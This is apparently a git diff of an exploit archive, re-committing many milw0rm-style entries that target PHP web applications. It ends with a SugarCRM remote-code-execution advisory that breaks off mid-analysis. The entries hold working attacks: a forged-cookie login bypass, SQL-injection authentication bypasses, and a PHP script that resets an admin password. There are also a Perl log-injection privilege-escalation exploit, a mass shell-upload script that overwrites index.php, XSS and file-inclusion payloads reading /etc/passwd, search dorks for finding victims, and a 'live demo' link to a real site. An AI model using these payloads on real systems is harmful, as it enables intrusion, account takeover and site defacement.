EXPLOIT: javascript:document.cookie = "logged_in=admin_username; path=/"; - *admin_username is the nick of the administrator - -#################################################################################################################### - -[/END] - -# milw0rm.com [2008-12-28] +[START] + +#################################################################################################################### +[0x01] Informations: + +Script : Silentum LoginSys 1.0.0 +Download : http://www.hotscripts.com/jump.php?listing_id=69667&jump_type=1 +Vulnerability : Insecure Cookie Handling +Author : Osirys +Contact : osirys[at]live[dot]it +Website : http://osirys.org +Notes : Proud to be Italian +Greets: : x0r, emgent, Jay, str0ke, Todd and AlpHaNiX + + +#################################################################################################################### +[0x02] Bug: [Insecure Cookie Handling] +###### + +Bugged file is: /[path]/login2.php + +[CODE] + + else { + setcookie("logged_in", $login_user_name, time()+60*60*24*$logged_in_for, "/"); + header("Location: index.php"); + exit; + } + +[/CODE] + +If we log in correctly, a cookie is set with name "logged_in" and as content the username name. + +[!] FIX: Set as content username's password. + +[CODE] setcookie("logged_in", $login_password, time()+60*60*24*$logged_in_for, "/"); [/CODE] + + +[!] EXPLOIT: javascript:document.cookie = "logged_in=admin_username; path=/"; + *admin_username is the nick of the administrator + +#################################################################################################################### + +[/END] + +# milw0rm.com [2008-12-28] diff --git a/platforms/php/webapps/7602.txt b/platforms/php/webapps/7602.txt index 650ff89ed..2644543fc 100755 --- a/platforms/php/webapps/7602.txt +++ b/platforms/php/webapps/7602.txt 
@@ -1,28 +1,28 @@ -************************************************************ -** webClassifieds™© 2005 Admin Login Bypass vulnerability -************************************************************ -** Prodcut: webClassifieds™© 2005 -** Home : http://www.webscribble.com/ -** Vunlerability : Admin Bypass -** Risk : low -** Dork : "powered by webClassifieds" -************************************************************ -** Discovred by: AnGeL25dZ -** From : Constantine - Algeria -** Contact : angel25dz@gmail.com -** ********************************************************* -** Greetz to : ALLAH -** All Members of HackTeachTeam http://www.hackteach.org/ -** cold zero, Ra3ch, His0k4 -************************************************************ -** Exploit: -** http://[PATH]//classifieds/index.php?page=sign_in -** -** user : admin / user : ' or '1=1 -** password : ' or '1=1 / password: ' or '1=1 -** -**************************************************************** -** Live demo : http://www.towpartners.com/classifieds/index.php?page=sign_in -**************************************************************** - -# milw0rm.com [2008-12-29] +************************************************************ +** webClassifieds™© 2005 Admin Login Bypass vulnerability +************************************************************ +** Prodcut: webClassifieds™© 2005 +** Home : http://www.webscribble.com/ +** Vunlerability : Admin Bypass +** Risk : low +** Dork : "powered by webClassifieds" +************************************************************ +** Discovred by: AnGeL25dZ +** From : Constantine - Algeria +** Contact : angel25dz@gmail.com +** ********************************************************* +** Greetz to : ALLAH +** All Members of HackTeachTeam http://www.hackteach.org/ +** cold zero, Ra3ch, His0k4 +************************************************************ +** Exploit: +** http://[PATH]//classifieds/index.php?page=sign_in +** +** user : admin / user : ' or '1=1 +** 
password : ' or '1=1 / password: ' or '1=1 +** +**************************************************************** +** Live demo : http://www.towpartners.com/classifieds/index.php?page=sign_in +**************************************************************** + +# milw0rm.com [2008-12-29] diff --git a/platforms/php/webapps/7605.php b/platforms/php/webapps/7605.php index 35ec7e6bf..37c04081c 100755 --- a/platforms/php/webapps/7605.php +++ b/platforms/php/webapps/7605.php @@ -1,73 +1,73 @@ - \n\n", $argv[0]); - exit; - } - - list($script, $target, $pass) = $argv; - - $xpl = curl_init(); - - curl_setopt_array($xpl, array - ( - CURLOPT_URL => "{$target}/profileedit.php", - CURLOPT_COOKIE => "auth=fook!admin", - CURLOPT_RETURNTRANSFER => true, - CURLOPT_POST => true, - CURLOPT_POSTFIELDS => "password={$pass}" - )); - - $ret = curl_exec($xpl); - curl_close($xpl); - - $out = preg_match_all('#Profile Updated<\/b>#', $ret, $tmp) ? "[+] Done. You can login now\n\n" : "[-] Exploitation failed\n\n"; - - echo $out; - -?> - -# milw0rm.com [2008-12-29] + \n\n", $argv[0]); + exit; + } + + list($script, $target, $pass) = $argv; + + $xpl = curl_init(); + + curl_setopt_array($xpl, array + ( + CURLOPT_URL => "{$target}/profileedit.php", + CURLOPT_COOKIE => "auth=fook!admin", + CURLOPT_RETURNTRANSFER => true, + CURLOPT_POST => true, + CURLOPT_POSTFIELDS => "password={$pass}" + )); + + $ret = curl_exec($xpl); + curl_close($xpl); + + $out = preg_match_all('#Profile Updated<\/b>#', $ret, $tmp) ? "[+] Done. You can login now\n\n" : "[-] Exploitation failed\n\n"; + + echo $out; + +?> + +# milw0rm.com [2008-12-29] diff --git a/platforms/php/webapps/7606.txt b/platforms/php/webapps/7606.txt index 43cc059ed..d30a64c23 100755 --- a/platforms/php/webapps/7606.txt +++ b/platforms/php/webapps/7606.txt 
@@ -1,18 +1,18 @@ -..:: R31P0l[at]hotmail.com ::.. - - -Tanx from : str0ke - - -Script : FubarForum - -Version : 1.6 - -Dork : "Powered by FubarForum v1.6" - -/forum/index.php?page=profile&user_id=1 - -Greetz to: -# Corenamed, Unsecured, Esedark, pax0r, zrallter, th0r... and TerminalHacker - -# milw0rm.com [2008-12-29] +..:: R31P0l[at]hotmail.com ::.. + + +Tanx from : str0ke + + +Script : FubarForum + +Version : 1.6 + +Dork : "Powered by FubarForum v1.6" + +/forum/index.php?page=profile&user_id=1 + +Greetz to: +# Corenamed, Unsecured, Esedark, pax0r, zrallter, th0r... and TerminalHacker + +# milw0rm.com [2008-12-29] diff --git a/platforms/php/webapps/7607.pl b/platforms/php/webapps/7607.pl index 35d3c577d..cb713516f 100755 --- a/platforms/php/webapps/7607.pl +++ b/platforms/php/webapps/7607.pl 
@@ -1,92 +1,92 @@ -#!/usr/bin/perl -w -# ------------------------------------------------------------------ -# Ultimate PHP Board <= 2.2.1 (log inj) Privilege Escalation Exploit -# ------------------------------------------------------------------ -# by athos - staker[at]hotmail[dot]it -# download on http://www.myupb.com/ -# ------------------------------------------------------------------ -# Usage: -# perl xpl.pl host path id email -# perl xpl.pl localhost/upb 21 root@r00x.com -# ------------------------------------------------------------------ -# Note: don't add me on msn messenger -# thanks evilsocket -# thanks meh for ajax code -# my email staker.38@gmail.com -# ------------------------------------------------------------------ - -use strict; -use IO::Socket; - -my ($host,$path,$id,$email) = @ARGV; - - -if (@ARGV != 4) { - - print "\n+--------------------------------------------------------------------+\r". - "\n| Ultimate PHP Board <= 2.2.1 (log inj) Privilege Escalation Exploit |\r". - "\n+--------------------------------------------------------------------+\r". - "\n(user -> admin xpl )by athos - staker[at]hotmail[dot]it\n". - "\nUsage + perl $0 [host] [path] [ID] [email]". - "\nHost + localhost". - "\nPath + forum path /upb)". - "\nID + your user ID". 
- "\nEmail + your/any email\n"; - exit; -} - -&exploit(); - - -sub exploit () { - - my $content = undef; - my $uagent = &logs; - my $packet = undef; - my $socket = new IO::Socket::INET( - PeerAddr => $host, - PeerPort => 80, - Proto => 'tcp', - ) or die $!; - - $packet .= "GET /$path/index.php HTTP/1.1\r\n"; - $packet .= "Host: $host\r\n"; - $packet .= "User-Agent: $uagent\r\n"; - $packet .= "Connection: close\r\n\r\n"; - - $socket->send($packet); - - while (<$socket>) { - $content .= $_; - } - - if ($content =~ m/myUPB/i) { - print "Exploit Done!\n"; - print "You'll become admin when the real admin will visit the logs\n"; - exit; - } - else { - print "Exploit Failed!\n"; - exit; - } -} - - -sub logs () { - -my $logs = "Lynx/2.8.7dev.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8d". - ""; - - return $logs; - -} - -# milw0rm.com [2008-12-29] +#!/usr/bin/perl -w +# ------------------------------------------------------------------ +# Ultimate PHP Board <= 2.2.1 (log inj) Privilege Escalation Exploit +# ------------------------------------------------------------------ +# by athos - staker[at]hotmail[dot]it +# download on http://www.myupb.com/ +# ------------------------------------------------------------------ +# Usage: +# perl xpl.pl host path id email +# perl xpl.pl localhost/upb 21 root@r00x.com +# ------------------------------------------------------------------ +# Note: don't add me on msn messenger +# thanks evilsocket +# thanks meh for ajax code +# my email staker.38@gmail.com +# ------------------------------------------------------------------ + +use strict; +use IO::Socket; + +my ($host,$path,$id,$email) = @ARGV; + + +if (@ARGV != 4) { + + print "\n+--------------------------------------------------------------------+\r". + "\n| Ultimate PHP Board <= 2.2.1 (log inj) Privilege Escalation Exploit |\r". + "\n+--------------------------------------------------------------------+\r". + "\n(user -> admin xpl )by athos - staker[at]hotmail[dot]it\n". 
+ "\nUsage + perl $0 [host] [path] [ID] [email]". + "\nHost + localhost". + "\nPath + forum path /upb)". + "\nID + your user ID". + "\nEmail + your/any email\n"; + exit; +} + +&exploit(); + + +sub exploit () { + + my $content = undef; + my $uagent = &logs; + my $packet = undef; + my $socket = new IO::Socket::INET( + PeerAddr => $host, + PeerPort => 80, + Proto => 'tcp', + ) or die $!; + + $packet .= "GET /$path/index.php HTTP/1.1\r\n"; + $packet .= "Host: $host\r\n"; + $packet .= "User-Agent: $uagent\r\n"; + $packet .= "Connection: close\r\n\r\n"; + + $socket->send($packet); + + while (<$socket>) { + $content .= $_; + } + + if ($content =~ m/myUPB/i) { + print "Exploit Done!\n"; + print "You'll become admin when the real admin will visit the logs\n"; + exit; + } + else { + print "Exploit Failed!\n"; + exit; + } +} + + +sub logs () { + +my $logs = "Lynx/2.8.7dev.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8d". + ""; + + return $logs; + +} + +# milw0rm.com [2008-12-29] diff --git a/platforms/php/webapps/7614.txt b/platforms/php/webapps/7614.txt index 3e79dbc20..c60dfcdbe 100755 --- a/platforms/php/webapps/7614.txt +++ b/platforms/php/webapps/7614.txt 
@@ -1,27 +1,27 @@ -############################################# -Autore: x0r -Email: andry2000@hotmail.it -Site: http://w00tz0ne.altervista.org/index.php -Cms: Flexphpdiren -Version: 0.0.1 -Download: http://www.china-on-site.com/flexphpdir/ -############################################## - -Bug In \admin\usercheck.php 'n' \add.php - -$sql = "select username,adminid from linkexadmin where -username='$checkuser' and password='$checkpass'"; - - -Exploit: - -Go to /[path]/admin/index.php -Put as username and password the following sql code: ' or '1=1 - -Shell Upload: - -Exploit: \add.php upload your shell and after /photo/ to see your shell ^ ^ - -Greetz: I Miss You... - -# milw0rm.com [2008-12-29] +############################################# +Autore: x0r +Email: andry2000@hotmail.it +Site: http://w00tz0ne.altervista.org/index.php +Cms: Flexphpdiren +Version: 0.0.1 +Download: http://www.china-on-site.com/flexphpdir/ +############################################## + +Bug In \admin\usercheck.php 'n' \add.php + +$sql = "select username,adminid from linkexadmin where +username='$checkuser' and password='$checkpass'"; + + +Exploit: + +Go to /[path]/admin/index.php +Put as username and password the following sql code: ' or '1=1 + +Shell Upload: + +Exploit: \add.php upload your shell and after /photo/ to see your shell ^ ^ + +Greetz: I Miss You... + +# milw0rm.com [2008-12-29] diff --git a/platforms/php/webapps/7615.txt b/platforms/php/webapps/7615.txt index e918fca6d..1ae07706a 100755 --- a/platforms/php/webapps/7615.txt +++ b/platforms/php/webapps/7615.txt 
@@ -1,22 +1,22 @@ -############################################# -Autore: x0r -Email: andry2000@hotmail.it -Site: http://w00tz0ne.altervista.org/index.php -Cms: Flexphpsiteen -Version: 0.0.1 -Download: http://www.china-on-site.com/flexphpsite/downloads.html -############################################## - -Bug In \admin\usercheck.php - -$sql = "select username,adminid from linkexadmin where -username='$checkuser' and password='$checkpass'"; - -Exploit: - -Go to /[path]/admin/index.php -Put as username and password the following sql code: ' or '1=1 - -Greetz: Anna <3 - -# milw0rm.com [2008-12-29] +############################################# +Autore: x0r +Email: andry2000@hotmail.it +Site: http://w00tz0ne.altervista.org/index.php +Cms: Flexphpsiteen +Version: 0.0.1 +Download: http://www.china-on-site.com/flexphpsite/downloads.html +############################################## + +Bug In \admin\usercheck.php + +$sql = "select username,adminid from linkexadmin where +username='$checkuser' and password='$checkpass'"; + +Exploit: + +Go to /[path]/admin/index.php +Put as username and password the following sql code: ' or '1=1 + +Greetz: Anna <3 + +# milw0rm.com [2008-12-29] diff --git a/platforms/php/webapps/7616.txt b/platforms/php/webapps/7616.txt index 7089b2823..f8646b72a 100755 --- a/platforms/php/webapps/7616.txt +++ b/platforms/php/webapps/7616.txt 
@@ -1,22 +1,22 @@ -############################################# -Autore: x0r -Email: andry2000@hotmail.it -Site: http://w00tz0ne.altervista.org/index.php -Cms: Flexphplink Pro -Version: 0.0.7 -Download: http://www.china-on-site.com/flexphplink/downloads.html -############################################## - -Bug In \admin\usercheck.php - -$sql = "select username,adminid from linkexadmin where -username='$checkuser' and password='$checkpass'"; - -Exploit: - -Go to /[path]/admin/index.php -Put as username and password the following sql code: ' or '1=1 - -Greetz: Visit My Site Pls :P - -# milw0rm.com [2008-12-29] +############################################# +Autore: x0r +Email: andry2000@hotmail.it +Site: http://w00tz0ne.altervista.org/index.php +Cms: Flexphplink Pro +Version: 0.0.7 +Download: http://www.china-on-site.com/flexphplink/downloads.html +############################################## + +Bug In \admin\usercheck.php + +$sql = "select username,adminid from linkexadmin where +username='$checkuser' and password='$checkpass'"; + +Exploit: + +Go to /[path]/admin/index.php +Put as username and password the following sql code: ' or '1=1 + +Greetz: Visit My Site Pls :P + +# milw0rm.com [2008-12-29] diff --git a/platforms/php/webapps/7620.txt b/platforms/php/webapps/7620.txt index 233019337..f55bea7a6 100755 --- a/platforms/php/webapps/7620.txt +++ b/platforms/php/webapps/7620.txt @@ -1,76 +1,76 @@ -[ web apps] theportal2 v2.2 (Auth bypass) file upload --------------------- -Author: siurek22 --------------------- - -You need curl to run it - --------------------- -Code: --------------------- -upload.php - - -

    -
    -
    - - -
    -'; -} -else{ -for($i=0; $i<$ile;$i++) -{ -$url=$fel[$i]; -$url2=$url."/admin/galeria.php?akcja=dodaj_foto"; -$url5=$url."/galeria/own.php"; - $c = curl_init(); - $postFields['adres'] = '@' . dirname(__FILE__) . '/own.php'; - $postFields['tytul'] = 'us'; - $postFields['opis'] = 'us'; - $postFields['kategoria'] = 1; - $postFields['B1'] = 'dodaj'; - curl_setopt($c, CURLOPT_URL, $url2); - curl_setopt($c, CURLOPT_POST, 1); - curl_setopt($c, CURLOPT_POSTFIELDS, $postFields); - curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); - $odpowiedz3=curl_exec($c); - - curl_close($c); -} -} -?> - ------------- - „own.php” with your code php -Example: - -"; -$adres=$_SERVER['SCRIPT_FILENAME']; -$adres=str_replace("own.php","",$adres); -$adres=substr($adres,0, -8); -$adres=$adres."index.php"; -$fp=fopen($adres,"w"); -fwrite($fp, $text); -fclose($fp); - -?> - -Example: -1 Put upload.php and own.php at server -2 Go to url yourserver.com/upload.php and put to the textarea adres of website and Click OWNED -3 Now go to url your file target.com/galeria/own.php - -# milw0rm.com [2008-12-29] +[ web apps] theportal2 v2.2 (Auth bypass) file upload +-------------------- +Author: siurek22 +-------------------- + +You need curl to run it + +-------------------- +Code: +-------------------- +upload.php + + +

    +
    +
    + << is reflected -locally only! - -2) http://[HOST]/tbdev/tbdev-01-01-08/my.php --- Avatar field: javascript:alert(0) - -2b) Affected Sites by HTML Injection: -http://[HOST]/tbdev/tbdev-01-01-08/userdetails.php?id=USERID - -Internet Explorer 6 and perhaps 7 should be triggered by this. -Please see: http://ha.ckers.org/xss.html for more information. -Browser Tested: Internet Explorer 7 (FireFox 3 was tested for the other -vulnerabilities) - --:: Solution ::- -Secure redirection calls with referer headers (just an example) and -filter bad characters. - -Conclusion: -This system was fun to find bad code in, it sure had a nice diversity of -vulnerabilities. - -Reference: -http://forum.intern0t.net/intern0t-advisories/1121-intern0t-tbdev-01-01-2008-multiple-vulnerabilities.html - -Disclosure Information: -- Vulnerabilities found, researched and confirmed between 5th to 10th June. -- Advisory finished and published on InterN0T the 12th June. -- Vendor and Buqtraq (SecurityFocus) contacted the 12th June. - - -All of the best, -MaXe - -# milw0rm.com [2009-06-12] +TBDev - Cross Site Scripting and HTML Injection Vulnerabilities + +Version Affected: 01-01-2008 (16th January 2008) (newest) + +Info: TBDEV.NET is a project to further enhance, update and develop a +software (php peer-to-peer) from the original torrentbits/bytemonsoon +source code. + +Credits: InterN0T + +External Links: +http://www.tbdev.net + + +-:: The Advisory ::- + +Vulnerable Function / ID Calls: +returnto + +Cross Site Scripting: (Sysops / Mods Only!) +http://[HOST]/tbdev/tbdev-01-01-08/makepoll.php?returnto=> +http://[HOST]/tbdev/tbdev-01-01-08/polls.php?action=delete&pollid=1&returnto=>
    alert(0) << is reflected +locally only! + +2) http://[HOST]/tbdev/tbdev-01-01-08/my.php +-- Avatar field: javascript:alert(0) + +2b) Affected Sites by HTML Injection: +http://[HOST]/tbdev/tbdev-01-01-08/userdetails.php?id=USERID + +Internet Explorer 6 and perhaps 7 should be triggered by this. +Please see: http://ha.ckers.org/xss.html for more information. +Browser Tested: Internet Explorer 7 (FireFox 3 was tested for the other +vulnerabilities) + +-:: Solution ::- +Secure redirection calls with referer headers (just an example) and +filter bad characters. + +Conclusion: +This system was fun to find bad code in, it sure had a nice diversity of +vulnerabilities. + +Reference: +http://forum.intern0t.net/intern0t-advisories/1121-intern0t-tbdev-01-01-2008-multiple-vulnerabilities.html + +Disclosure Information: +- Vulnerabilities found, researched and confirmed between 5th to 10th June. +- Advisory finished and published on InterN0T the 12th June. +- Vendor and Buqtraq (SecurityFocus) contacted the 12th June. + + +All of the best, +MaXe + +# milw0rm.com [2009-06-12] diff --git a/platforms/php/webapps/8943.txt b/platforms/php/webapps/8943.txt index 707252fd3..a50187bab 100755 --- a/platforms/php/webapps/8943.txt +++ b/platforms/php/webapps/8943.txt 
@@ -1,63 +1,63 @@ -transLucid - Cross Site Scripting and HTML Injection Vulnerabilities - -Version Affected: 1.75 (newest) - -Info: transLucidonline is the easy website publishing system with which -anyone can create and maintain web content, in multiple languages and -based on a growing list of ready-made, professional layouts. - -Credits: InterN0T (macd3v and MaXe) - -External Links: -http://www.pantha.net/ - - --:: The Advisory ::- - -Vulnerable Function / ID Calls: -NodeID & action (vulnerable in both admin and public panels) - -Cross Site Scripting: (anyone - this was tested with public mode on) -1) -http://[HOST]/translucid/transLucid_175/?NodeID="> -2) -http://[HOST]/translucid/transLucid_175/?action="> -(found by macd3v) -3) -http://[HOST]/translucid/transLucid_175/?admin_section=1&NodeID="> --- Number 3 might require moderator or administrative access if public -mode is not turned on. - -HTML Injection: -- If public mode is on / chosen, editing the following page-fields will -result in script execution: Title & Url - -Adding a new page can result in HTML Injection too. (Parent & Child -pages were fully tested.) - -Affected Sites by HTML Injection: (there will most likely be a lot more.) -http://[HOST]/translucid/transLucid_175/?action=switchto_editmode --- In the admin panel "> needs to be prepended most likely in order to -execute the injection. ---=-- Switching the theme to Developer can result in HTML Injection if -there is any injected. - --:: Solution ::- -Regular expression match and / or bad characters conversion rocks! - -Conclusion: -Easy to install and use, but the code should have been reviewed long ago. - -Reference: -http://forum.intern0t.net/intern0t-advisories/1122-intern0t-translucid-1-75-multiple-vulnerabilities.html - -Disclosure Information: -- Vulnerabilities found, researched and confirmed between 5th to 10th June. -- Advisory finished and published on InterN0T the 12th June. 
-- Vendor and Buqtraq (SecurityFocus) contacted the 12th June. - - -All of the best, -MaXe - -# milw0rm.com [2009-06-12] +transLucid - Cross Site Scripting and HTML Injection Vulnerabilities + +Version Affected: 1.75 (newest) + +Info: transLucidonline is the easy website publishing system with which +anyone can create and maintain web content, in multiple languages and +based on a growing list of ready-made, professional layouts. + +Credits: InterN0T (macd3v and MaXe) + +External Links: +http://www.pantha.net/ + + +-:: The Advisory ::- + +Vulnerable Function / ID Calls: +NodeID & action (vulnerable in both admin and public panels) + +Cross Site Scripting: (anyone - this was tested with public mode on) +1) +http://[HOST]/translucid/transLucid_175/?NodeID="> +2) +http://[HOST]/translucid/transLucid_175/?action="> +(found by macd3v) +3) +http://[HOST]/translucid/transLucid_175/?admin_section=1&NodeID="> +-- Number 3 might require moderator or administrative access if public +mode is not turned on. + +HTML Injection: +- If public mode is on / chosen, editing the following page-fields will +result in script execution: Title & Url + +Adding a new page can result in HTML Injection too. (Parent & Child +pages were fully tested.) + +Affected Sites by HTML Injection: (there will most likely be a lot more.) +http://[HOST]/translucid/transLucid_175/?action=switchto_editmode +-- In the admin panel "> needs to be prepended most likely in order to +execute the injection. +--=-- Switching the theme to Developer can result in HTML Injection if +there is any injected. + +-:: Solution ::- +Regular expression match and / or bad characters conversion rocks! + +Conclusion: +Easy to install and use, but the code should have been reviewed long ago. + +Reference: +http://forum.intern0t.net/intern0t-advisories/1122-intern0t-translucid-1-75-multiple-vulnerabilities.html + +Disclosure Information: +- Vulnerabilities found, researched and confirmed between 5th to 10th June. 
+- Advisory finished and published on InterN0T the 12th June. +- Vendor and Buqtraq (SecurityFocus) contacted the 12th June. + + +All of the best, +MaXe + +# milw0rm.com [2009-06-12] diff --git a/platforms/php/webapps/8946.txt b/platforms/php/webapps/8946.txt index 706649afb..8045c8716 100755 --- a/platforms/php/webapps/8946.txt +++ b/platforms/php/webapps/8946.txt @@ -1,34 +1,34 @@ - \\\|/// - \\ - - // - ( @ @ ) -----oOOo--(_)-oOOo--------------------------- -@~~=Author : ByALBAYX - -@~~=Website : WWW.C4TEAM.ORG ----------------Ooooo------------------------- - ( ) - ooooO ) / - ( ) (_/ - \ ( - \_) -@~~=======================================~~@ -@~~=Script : Joomla Component Com_Projectfork - -@~~=S.Site : http://joomlapraise.com -@~~=======================================~~@ - -@~~=Vul : - -@~~=http://c4team.org/ [Yol] /index.php?option=com_projectfork§ion= [-LFI-] - -@~~=Dork : inurl:"com_projectfork" - -@~~=http://kht.by.ru/Google.txt - -@~~=Vs.. - -@~~=======================================~~@ - -@~~=:/ - -# milw0rm.com [2009-06-15] + \\\|/// + \\ - - // + ( @ @ ) +----oOOo--(_)-oOOo--------------------------- +@~~=Author : ByALBAYX + +@~~=Website : WWW.C4TEAM.ORG +---------------Ooooo------------------------- + ( ) + ooooO ) / + ( ) (_/ + \ ( + \_) +@~~=======================================~~@ +@~~=Script : Joomla Component Com_Projectfork + +@~~=S.Site : http://joomlapraise.com +@~~=======================================~~@ + +@~~=Vul : + +@~~=http://c4team.org/ [Yol] /index.php?option=com_projectfork§ion= [-LFI-] + +@~~=Dork : inurl:"com_projectfork" + +@~~=http://kht.by.ru/Google.txt + +@~~=Vs.. + +@~~=======================================~~@ + +@~~=:/ + +# milw0rm.com [2009-06-15] diff --git a/platforms/php/webapps/8947.txt b/platforms/php/webapps/8947.txt index a8686596c..38f321b01 100755 --- a/platforms/php/webapps/8947.txt +++ b/platforms/php/webapps/8947.txt 
@@ -1,35 +1,35 @@ -################################################################################################################# -[+] Impleo Music Collection 2.0 (SQL/XSS) Multiple Remote Vulnerabilities -[+] Download: http://sappy.dk/impleo/download-impleo -[+] Discovered By SirGod -[+] www.mortal-team.org -################################################################################################################# - -[+] SQL Injection ( Auth Bypass ) - -- Requirements : magic_quotes_gpc = off - -- Vulnerable code in /admin/login.php - -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- - $postbruger = $_POST['username']; - $postpass = md5($_POST['password']); - $resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = '$postbruger' AND password = '$postpass'") -or die("

    " . mysql_error() . "

    \n"); -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- - -- PoC - - Login Username : admin ' or ' 1=1 - Login Password : anything - - -[+] Cross Site Scripting - -- PoC - - http://127.0.0.1/[path]/index.php?sort="> - -################################################################################################################# - -# milw0rm.com [2009-06-15] +################################################################################################################# +[+] Impleo Music Collection 2.0 (SQL/XSS) Multiple Remote Vulnerabilities +[+] Download: http://sappy.dk/impleo/download-impleo +[+] Discovered By SirGod +[+] www.mortal-team.org +################################################################################################################# + +[+] SQL Injection ( Auth Bypass ) + +- Requirements : magic_quotes_gpc = off + +- Vulnerable code in /admin/login.php + +------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- + $postbruger = $_POST['username']; + $postpass = md5($_POST['password']); + $resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = '$postbruger' AND password = '$postpass'") +or die("

    " . mysql_error() . "

    \n"); +------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- + +- PoC + + Login Username : admin ' or ' 1=1 + Login Password : anything + + +[+] Cross Site Scripting + +- PoC + + http://127.0.0.1/[path]/index.php?sort="> + +################################################################################################################# + +# milw0rm.com [2009-06-15] diff --git a/platforms/php/webapps/8948.txt b/platforms/php/webapps/8948.txt index 10b8939f5..a73c56b82 100755 --- a/platforms/php/webapps/8948.txt +++ b/platforms/php/webapps/8948.txt 
@@ -1,50 +1,50 @@ ----------------------------------------------------------------------------------------------------------- - - - Name : Mundi Mail - Site : http://sourceforge.net/projects/mundimail/ - - Down : http://sourceforge.net/project/showfiles.php?group_id=100875&package_id=108474&release_id=221732 - - ----------------------------------------------------------------------------------------------------------- - - - - Found By : br0ly - Made in : Brasil - Contact : br0ly[dot]Code[at]gmail[dot]com - - ----------------------------------------------------------------------------------------------------------- - - - Description: - - Bug : Local/Remote File Inclusion - - template/simpledefault/admin/_masterlayout.php:10: include($top); - - - - - If allow_url_fopen=on --> RFI; - If magic_quotes_gpc=off --> LFI; - - - ----------------------------------------------------------------------------------------------------------- - - - P0c: - - LFI:http://localhost/Scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=/etc/passwd - - RFI:http://localhost/Scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=[EVIL_CODE] - - - OBS: need register_globals=on; - ----------------------------------------------------------------------------------------------------------- - -# milw0rm.com [2009-06-15] +---------------------------------------------------------------------------------------------------------- + + + Name : Mundi Mail + Site : http://sourceforge.net/projects/mundimail/ + + Down : http://sourceforge.net/project/showfiles.php?group_id=100875&package_id=108474&release_id=221732 + + +---------------------------------------------------------------------------------------------------------- + + + + Found By : br0ly + Made in : Brasil + Contact : br0ly[dot]Code[at]gmail[dot]com + + +---------------------------------------------------------------------------------------------------------- + + + Description: + + Bug : Local/Remote File Inclusion 
+ + template/simpledefault/admin/_masterlayout.php:10: include($top); + + + + + If allow_url_fopen=on --> RFI; + If magic_quotes_gpc=off --> LFI; + + + +---------------------------------------------------------------------------------------------------------- + + + P0c: + + LFI:http://localhost/Scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=/etc/passwd + + RFI:http://localhost/Scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=[EVIL_CODE] + + + OBS: need register_globals=on; + +---------------------------------------------------------------------------------------------------------- + +# milw0rm.com [2009-06-15] diff --git a/platforms/php/webapps/8949.txt b/platforms/php/webapps/8949.txt index 3d98d7dce..3dd93f99f 100755 --- a/platforms/php/webapps/8949.txt +++ b/platforms/php/webapps/8949.txt 
@@ -1,200 +1,200 @@ -SugarCRM 5.2.0e Remote Code Execution - - Name Remote Code Execution in SugarCRM - Systems Affected Sugar CRM 5.2.0e and possibly earlier versions - Severity High - Impact (CVSSv2) High 8/10, vector: (AV:N/AC:L/Au:S/C:P/I:C/A:P) - Vendor http://www.sugarcrm.com - Advisory http://www.ush.it/team/ush/hack-sugarcrm_520e/adv.txt - Authors Antonio "s4tan" Parata (s4tan AT ush DOT it) - Francesco "ascii" Ongaro (ascii AT ush DOT it) - Giovanni "evilaliv3" Pellerano (evilaliv3 AT ush DOT it) - Date 20090613 - -I. BACKGROUND - ->From the SugarCRM web site: "Sugar Express is designed for individuals -and small companies. Core CRM features help employees get on the same -page while more complex functionality is stripped away. Sugar Express is -ideal for providing a single view of the customer from the initial -marketing campaign through the sales cycle and on to customer support. -With Sugar Express, companies have a single system of truth for managing -customer interactions.". - -II. DESCRIPTION - -A Remote Code Execution Vulnerability exists in SugarCRM software. - -III. ANALYSIS - -Summary: - -A Remote Code Execution issue has been found in SugarCRM version -5.2.0e. In order to exploit this vulnerability an account on the system -is required. - -The vulnerability resides in the "Compose Email" section. The software -permits sending email with attachments (if not disabled by the -administrator). When the name of the file is specified, a validation -routine is called: - ---8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- - -function safeAttachmentName($filename) { - global $sugar_config; - $badExtension = false; - //get position of last "." 
in file name - $file_ext_beg = strrpos($filename, "."); - $file_ext = ""; - //get file extension - if($file_ext_beg > 0) { - $file_ext = substr($filename, $file_ext_beg + 1); - } - //check to see if this is a file with extension located in "badext" - foreach($sugar_config['upload_badext'] as $badExt) { - if(strtolower($file_ext) == strtolower($badExt)) { - //if found, then append with .txt and break out of lookup - $filename = $filename . ".txt"; - $badExtension = true; - break; // no need to look for more - } // if - } // foreach - return $badExtension; -} - ---8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- - -This routine checks if the extension of the filename is blacklisted, -if so the ".txt" extension is appended to the filename. However there is -a coding error: the function assumes that the filename (extension -excluded) is at least one char long, this assumption is derived from the -statement: - ---8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- - -if($file_ext_beg > 0) - ---8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- - -Of course this is a bad assumption, if we set the whole filename to -".php" than the check is skipped and a void extension is assumed. -Because void extensions are not in the blacklist, no futher extension -is added to the filename. After this check a file is created on the -filesystem in the form "". - -Where "id" is an alphanumeric string. With the trick illustrated we are -able to create a file with ".php" extension. To do this upload a new -file attachment and set the filename to ".php". - -After this the attacker has to find the name of the file that was -uploaded in the attachment list files. 
